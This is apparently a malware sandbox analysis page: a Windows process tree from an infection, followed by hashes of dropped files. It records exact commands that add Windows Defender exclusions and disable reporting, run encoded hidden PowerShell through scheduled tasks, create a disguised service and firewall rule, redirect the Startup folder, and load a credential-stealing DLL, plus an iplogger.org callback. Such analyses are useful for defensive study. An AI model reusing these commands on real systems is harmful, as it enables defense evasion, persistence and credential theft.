C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUZSpxqjE" /SC once /ST 01:23:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUZSpxqjE"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUZSpxqjE"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 4245⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 6965⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 7165⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 6965⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 7765⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 9565⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\setup777.exe.exe"C:\Users\Admin\Pictures\Adobe Films\setup777.exe.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\random.exe.exe"C:\Users\Admin\Pictures\Adobe Films\random.exe.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\random.exe.exe"C:\Users\Admin\Pictures\Adobe Films\random.exe.exe" -h5⤵
-
C:\Users\Admin\Pictures\Adobe Films\search_hyperfs_310.exe.exe"C:\Users\Admin\Pictures\Adobe Films\search_hyperfs_310.exe.exe"4⤵
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" .\TyWx.WRV5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\TyWx.WRV6⤵
-
C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe"C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe"4⤵
-
C:\Windows\SysWOW64\ftp.exeftp -?5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Esistenza.wbk5⤵
-
C:\Windows\SysWOW64\cmd.execmd6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\SetupMEXX.exe.exe"C:\Users\Admin\Pictures\Adobe Films\SetupMEXX.exe.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 376 -s 22883⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\TrdngAnlzr22649.exe.exe"C:\Users\Admin\Pictures\Adobe Films\TrdngAnlzr22649.exe.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\A15E0.exe"C:\Users\Admin\AppData\Local\Temp\A15E0.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\0K69C.exe"C:\Users\Admin\AppData\Local\Temp\0K69C.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\L2A28.exe"C:\Users\Admin\AppData\Local\Temp\L2A28.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\6H0MJ.exe"C:\Users\Admin\AppData\Local\Temp\6H0MJ.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\6H0MJ294L89EMD7.exehttps://iplogger.org/1x4az73⤵
-
C:\Users\Admin\Pictures\Adobe Films\Offscum.exe.exe"C:\Users\Admin\Pictures\Adobe Films\Offscum.exe.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe"C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ftp.exeftp -?3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Esistenza.wbk3⤵
-
C:\Windows\SysWOW64\cmd.execmd4⤵
-
C:\Users\Admin\Pictures\Adobe Films\rrmix.exe.exe"C:\Users\Admin\Pictures\Adobe Films\rrmix.exe.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 324 -s 8523⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe"3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\45036d16-9928-4c82-9150-c0bdffe60756" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe" --Admin IsNotAutoStart IsNotTask5⤵
-
C:\Users\Admin\AppData\Local\53dbdfbf-4e7e-4600-b31e-73e4fbc80e21\build2.exe"C:\Users\Admin\AppData\Local\53dbdfbf-4e7e-4600-b31e-73e4fbc80e21\build2.exe"6⤵
-
C:\Users\Admin\AppData\Local\53dbdfbf-4e7e-4600-b31e-73e4fbc80e21\build2.exe"C:\Users\Admin\AppData\Local\53dbdfbf-4e7e-4600-b31e-73e4fbc80e21\build2.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\real2001.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\real2001.bmp.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im real2001.bmp.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\real2001.bmp.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im real2001.bmp.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 460 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 460 -s 7683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 460 -s 7763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 460 -s 7763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 460 -s 7883⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 460 -s 8363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 460 -s 10203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 460 -s 13483⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "mixinte.bmp.exe" /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 460 -s 12923⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\norm2.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\norm2.bmp.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 7403⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\Fenix_9.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\Fenix_9.bmp.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Krema.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\Krema.bmp.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\13.php.exe"C:\Users\Admin\Pictures\Adobe Films\13.php.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\itfuhdr\3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xvrjqifn.exe" C:\Windows\SysWOW64\itfuhdr\3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create itfuhdr binPath= "C:\Windows\SysWOW64\itfuhdr\xvrjqifn.exe /d\"C:\Users\Admin\Pictures\Adobe Films\13.php.exe\"" type= own start= auto DisplayName= "wifi support"3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description itfuhdr "wifi internet conection"3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start itfuhdr3⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 6403⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe"C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8c7aecc852\4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8c7aecc852\5⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN orxds.exe /TR "C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b51ecacb95f3fd\cred.dll, Main4⤵
-
C:\Users\Admin\Pictures\Adobe Films\arabcode_crypted_3.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\arabcode_crypted_3.bmp.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\svmine.exe"C:\Users\Admin\AppData\Local\Temp\svmine.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\wam.exe.exe"C:\Users\Admin\Pictures\Adobe Films\wam.exe.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 203⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 204⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\Zebnjlreyccstbgwfpgmax1.exe"C:\Users\Admin\AppData\Local\Temp\Zebnjlreyccstbgwfpgmax1.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\wam.exe.exe"C:\Users\Admin\Pictures\Adobe Films\wam.exe.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 21442⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 460 -ip 4601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 776 -ip 7761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3932 -ip 39321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 460 -ip 4601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2084 -ip 20841⤵
-
C:\Windows\SysWOW64\itfuhdr\xvrjqifn.exeC:\Windows\SysWOW64\itfuhdr\xvrjqifn.exe /d"C:\Users\Admin\Pictures\Adobe Films\13.php.exe"1⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 5162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 460 -ip 4601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 460 -ip 4601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 204 -ip 2041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 460 -ip 4601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2520 -ip 25201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 460 -ip 4601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2520 -ip 25201⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 436 -ip 4361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 460 -ip 4601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2520 -ip 25201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2520 -ip 25201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 324 -ip 3241⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 460 -ip 4601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 376 -ip 3761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2520 -ip 25201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 460 -ip 4601⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2520 -ip 25201⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
727B
MD5263d12469947e2539c2a2a04bb056345
SHA1a63fd9efc397db4cc1a82cf89b7fc8e0f6694d39
SHA256102af65a56e5cea616b871487be0aa8525e3258d514ca80d3a2918c3a4f23315
SHA512571bd3d3ec72023ea4ec0861baeff535fc3e71716f2c08c3305f25d615448b13a4d4bc0f7d05c500f523ad13e6ba3c2e2549891c63cc170b7f1743bc8a148df1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8FFilesize
7KB
MD55c1113b7526a7723b64400d44129fa78
SHA1af1b7813ad3e00d4699e5514a77984d5b423b757
SHA2569ecc27c740862ab2712da2c4ff31592e2c0a8643576e64551ee344a73fbe2494
SHA5124b47b9886884bc1eb0651c53eb1805922b2889d42076665bbd9f4b818d54c1bc86956e79cdc254c847b83640373b22a77f9bed9987fbd58c9104bca807a2d2d7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EFilesize
471B
MD51670ab0904b0779e9046a6c0ae0ccf8b
SHA10030369be3da0ef23ac809d8963fdeb76de17eeb
SHA25634a5f72509ddfed75552cbb5007e460c9c9f6dc6c511b12e32083b1a9c030ba5
SHA512e0cf63ec3f97979c2ad1318954f2daecc3639c3112548796ba8996eb119443a4bca933e1353f1dfd4068de7925ef765a3a9f4f5591702c5876b9a46246415e7e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
402B
MD563037861de5327d9fa17a2c901431830
SHA17be595a49468cb488650d1de4c839edcd9db067f
SHA256145d37bd1881561b6ecd8b4bd83f7a5387c403e985bb0ac5a24dc079b6733928
SHA512958748ab98f283d7ae18b515e709f84315cf68833969887408c95af6e5a76a45398374664535b60ce2addcb70e3bb17e2fd56e981a62e4a381a8586367438cde
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8FFilesize
226B
MD5b34a8e9ebbcaf8ee1300a15974e775a5
SHA1291b29cf9caec147840959ff6c54b54fe2034ad1
SHA256379e36fe2ea93ec0ed28398bd664e1644edb27f6ff533d78fbc9431baa168c89
SHA512cfc2524d4835044e4011648a8bd2741de5ffcb928fe29eacecc9e0c76666382cee7c31d279101626721799bf0e0f486b72be5d479ec496172db72c82acabc6b2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EFilesize
396B
MD55b5b18dd3748a99eb377b50eb68bca17
SHA16d456453a31c8babdd88590e6df9ce5c4bcd743e
SHA2569adecfb9d1a0802203df9c9c1537625eadba5dade2521385efd4f997a8d1c66f
SHA512a6410d574c4185320e0d1b5c754d9b93b98053db33ddb79c07fb9a2159974a45f540b5895b618c0d00d0e36d15ab56326bc124efa0bd05289d564748fea51490
-
C:\Users\Admin\AppData\Local\45036d16-9928-4c82-9150-c0bdffe60756\test33.bmp.exeFilesize
848KB
MD59888831bbf23b1d83af23b2d373556d5
SHA11721d66010be897e384089fc71a8beda9e9ad05c
SHA25697f10a9dc49e9be3fad477aadb75de84fdf8eca76c7029a6c1b05d5ca9738b79
SHA512e7e24410c11e77ed2b92d87a55ecdbd6b13f03b635d3bbe92f5ec042d91965dcaa3a831bf189d8b69926c75a81c164943c4edeae2db1d3d4f28935b59ff3cabe
-
C:\Users\Admin\AppData\Local\Temp\7zS360F.tmp\Install.exeFilesize
6.1MB
MD54deb310e2c70911fef38e50b4e12b8af
SHA1fb40c17d7213d3e90974c8554747771410317e85
SHA256adbab9c675ff1955c6dc041a3036bab1dd4f35fae10294f4edb61d58bde3215d
SHA512384813994cf80c9d721b7fc2da2f78c5ffa7638a77a90b5de77700f4a5a73c8764288b1dc719a121e6162d078947cbdae52b727b2e8f6f21f515a21d8033a4a1
-
C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exeFilesize
5.4MB
MD53a3706d7e37223c5f6fa0587586efe59
SHA1980d3a6877ef89e9c972dad1c40aa6470f7b11e9
SHA256013530b627569b2c70577679cd756dd54835439b166c896347398f6f6aef0e8d
SHA5126441dbaa82b8619a29fef9e2d457eba68667793e8b463cf9c187bd09733904d647f6aa12b242971f5d8ae5b7e59aee753ea65a5da5a00cef04de99c4fb56c5d3
-
C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exeFilesize
5.4MB
MD53a3706d7e37223c5f6fa0587586efe59
SHA1980d3a6877ef89e9c972dad1c40aa6470f7b11e9
SHA256013530b627569b2c70577679cd756dd54835439b166c896347398f6f6aef0e8d
SHA5126441dbaa82b8619a29fef9e2d457eba68667793e8b463cf9c187bd09733904d647f6aa12b242971f5d8ae5b7e59aee753ea65a5da5a00cef04de99c4fb56c5d3
-
C:\Users\Admin\AppData\Local\Temp\pidHTSIGEi8DrAmaYu9K8ghN89.dllFilesize
167KB
MD5f07ac9ecb112c1dd62ac600b76426bd3
SHA18ee61d9296b28f20ad8e2dca8332ee60735f3398
SHA25628859fa0e72a262e2479b3023e17ee46e914001d7f97c0673280a1473b07a8c0
SHA512777139fd57082b928438b42f070b3d5e22c341657c5450158809f5a1e3db4abded2b566d0333457a6df012a4bbe3296b31f1caa05ff6f8bd48bfd705b0d30524
-
C:\Users\Admin\AppData\Local\Temp\xvrjqifn.exeFilesize
14.7MB
MD59ac5d20f642952ad44fa9dbe8c30436b
SHA1d93a45271e7b2fae74516b2da49326b457129f73
SHA2563ef7be68eafd80a72b12e747296f7585b5eaffbc5f7921c463f585274c83e7de
SHA5124d953058ac765e71d0e70e653b393505fcd6edfbae0746574d17569f414cce61e35610c2756b786ad5e7ca98c846c2b18c8fa01982c0940e6536371b137f6693
-
C:\Users\Admin\Documents\soNus2fDmB7rss3i9TWV0ToN.exeFilesize
232KB
MD55546c1ab6768292b78c746d9ea627f4a
SHA1be3bf3f21b6101099bcfd7203a179829aea4b435
SHA25693708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA51290d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f
-
C:\Users\Admin\Documents\soNus2fDmB7rss3i9TWV0ToN.exeFilesize
232KB
MD55546c1ab6768292b78c746d9ea627f4a
SHA1be3bf3f21b6101099bcfd7203a179829aea4b435
SHA25693708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA51290d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f
-
C:\Users\Admin\Pictures\Adobe Films\13.php.exeFilesize
304KB
MD5da42ba7aa8ed2bb1ae7d28dddf329bbb
SHA15c71b7c8d67962784fbecae0add8c0bf5709c499
SHA256845b34a9bd47d383c3718e4e7c0a15cac39c9b4342f500d7778fdc26806d0c00
SHA5128c25e0fde2ec99a3b1cb5203c3485c5c3332684ac76706385c21c0f7c42661433135bf2b30e4feae4a563e241923a9174cd61dd9b6a4bd41cd092015ace31325
-
C:\Users\Admin\Pictures\Adobe Films\13.php.exeFilesize
304KB
MD5da42ba7aa8ed2bb1ae7d28dddf329bbb
SHA15c71b7c8d67962784fbecae0add8c0bf5709c499
SHA256845b34a9bd47d383c3718e4e7c0a15cac39c9b4342f500d7778fdc26806d0c00
SHA5128c25e0fde2ec99a3b1cb5203c3485c5c3332684ac76706385c21c0f7c42661433135bf2b30e4feae4a563e241923a9174cd61dd9b6a4bd41cd092015ace31325
-
C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exeFilesize
970KB
MD5f29fe566b8797d64ac411332c46012f5
SHA14a443134a6f354c063dafcbf83a09b81c164be9f
SHA256025263cde993621dab74b48373910273a8e770930b6e564068377b73a41ac0ab
SHA51290cd8d3132d4c483c47d0bfdc4d9cc3b44b4f096720ef624f01c8811dc52bc77040b063fa7a2df9819b3d493815d9d39578fdb57d88baf42210eede99f284619
-
C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exeFilesize
970KB
MD5f29fe566b8797d64ac411332c46012f5
SHA14a443134a6f354c063dafcbf83a09b81c164be9f
SHA256025263cde993621dab74b48373910273a8e770930b6e564068377b73a41ac0ab
SHA51290cd8d3132d4c483c47d0bfdc4d9cc3b44b4f096720ef624f01c8811dc52bc77040b063fa7a2df9819b3d493815d9d39578fdb57d88baf42210eede99f284619
-
C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exeFilesize
970KB
MD5f29fe566b8797d64ac411332c46012f5
SHA14a443134a6f354c063dafcbf83a09b81c164be9f
SHA256025263cde993621dab74b48373910273a8e770930b6e564068377b73a41ac0ab
